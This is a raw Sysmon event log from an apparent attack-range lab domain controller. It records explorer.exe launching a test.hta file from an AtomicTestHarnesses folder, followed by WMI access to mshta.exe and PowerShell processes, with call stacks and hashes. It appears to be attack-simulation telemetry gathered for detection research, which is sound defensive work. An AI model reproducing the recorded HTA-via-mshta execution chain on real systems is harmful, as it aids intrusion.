15:59:15.585{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023012Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.585{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023011Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.585{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000023010Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.597{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000023009Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.585{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5353-6008-2E06-00000000A301}7988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023008Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.585{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5353-6008-2E06-00000000A301}7988C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023007Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.585{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5353-6008-2E06-00000000A301}7988C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023006Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.570{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5353-6008-2E06-00000000A301}7988C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023005Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.570{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023004Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.570{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023003Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.570{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023002Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.570{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023001Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.570{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5353-6008-2E06-00000000A301}7988C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023000Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.570{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2E06-00000000A301}7988C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000022999Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.569{7901BC46-5353-6008-2E06-00000000A301}7988C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEexplorer.exe "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000022998Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2D06-00000000A301}5924C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022997Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022996Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022995Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2A06-00000000A301}1324C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022994Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022993Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022992Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2706-00000000A301}4972C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022991Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022990Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2506-00000000A301}7236C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022989Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022988Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 